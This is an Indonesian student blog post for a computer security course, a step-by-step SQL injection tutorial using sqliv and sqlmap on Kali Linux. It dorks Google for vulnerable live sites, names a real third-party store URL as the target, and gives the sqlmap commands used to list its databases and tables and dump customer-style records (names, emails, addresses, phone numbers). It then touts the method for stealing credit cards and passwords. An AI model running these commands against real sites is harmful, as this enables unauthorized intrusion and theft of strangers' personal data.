SQL Injection

Diposting oleh

SQL INJECTION (SQLMAP Kali Linux)
Rizwan Ferrari 1715015015
Bayu Mahardika 1715015019
Iga Vita Suri 1715015034
Nadya Salsabilla Putri 1715015041

Dosen Pengampu mata kuliah Sistem Keamanan Komputer : Hario Jati Setyadi, M.Kom

Persiapan :
Download Kali Linux DISINI
Install Kali Linux di pc / virtual machine kalian
Jika sudah nyalakan Kali Linux dan buka terminal kalian

Tahap 1 : Install Sqliv
Sqliv adalah tools yang dapat digunakan untuk mencari web yang vulnerable terhadap serangan SQL Injection

Ketikan : git clone https://github.com/Hadesy2k/sqliv.git pada terminal kalian


Jika sudah install Sqliv dengan mengetikan : cd sqliv dan sudo python2 setup.py –i


Setelah selesai terinstall buka sqliv dan cari website yang vulnerable dengan menggunakan command : sqliv -d inurl:item.php?id= -e google -p 100
“-p 100” digunakan untuk membatasi sebanyak 100 situs yang akan dicari dan dicek


Pencarian akan membutuhkan waktu yang cukup lama. Siapkan kopi dan udud kalian untuk mengisi waktu :-D. Untuk menggunakan pattern lain silahkan cari di google menggunakan kata kunci “google dork list”

Setelah pencarian selesai akan tampil seperti ini


Dari 100 website kita hanya mendapatkan 7 website yang vulnerable terhadap serangan SQL Injection. Simpan kedalam file text dan lanjut ke tahap selanjutnya

Tahap 2 : Penyerangan SQL Injection
Semua sudah saya coba dan saya hanya berhasil mendapatkan database dari 1 website saja yaitu :
http://www.asoyuki.com/store/item.php?id=12

Selanjutnya kita lakukan penyerangan dengan mengetikan : sqlmap -u “TARGET” –dbs

 

Jika berhasil maka akan menampilkan database yang ada di website tersebut


Selanjutnya kita akan membuka database dan menampilkan table yang berada dalam database tersebut dengan cara mengetikan : sqlmap –u “TARGET” –D (nama database) –tables



Jika berhasil maka akan muncul table dari database tersebut


Setelah itu kita akan menampilkan ada kolom apa saja yang terdapat pada table “producer” dengan cara mengetikan :
sqlmap –u “TARGET” –D “NAMA DATABASE” –T “NAMA TABEL” –columns


Setelah itu maka akan tampil kolom apa saja yang ada pada tabel producer


Setelah itu kita akan membuka isi dari kolom “name, mail, address, tel” pada table producer dengan cara mengetikan :
sqlmap -u “TARGET” -D “NAMA DATABASE” -T “NAMA TABEL” -C “NAMA KOLOM”
--dump


Maka akan tertampil data dari kolom tersebut


Meskipun kita tidak sepenuhnya meretas target kita, paling tidak kita sudah banyak belajar menggunakan metode SQL Injection dengan menggunakan SQL Map pada kali linux.

Metode ini sangat ampuh untuk mendapatkan data-data seperti kartu kredit, username, password dll.

Comments

Post a Comment